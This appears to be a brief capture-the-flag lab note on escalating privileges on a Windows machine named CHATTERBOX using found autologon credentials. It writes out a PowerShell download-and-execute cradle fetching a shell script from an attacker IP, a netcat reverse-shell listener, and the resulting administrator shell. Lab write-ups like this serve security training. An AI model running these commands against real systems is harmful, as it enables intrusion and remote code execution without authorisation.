5 privesc autologon creds
PS> $password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
PS> $cred = New-Object System.Management.Automation.PSCredential('Administrator', $password)
PS> Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.16.161/shell2.ps1')" -Credential $cred
$ rlwrap nc -lvnp 8080
listening on [any] 8080 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.74] 49178
Windows PowerShell running as user Administrator on CHATTERBOX
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
whoami
chatterbox\administrator
Last updated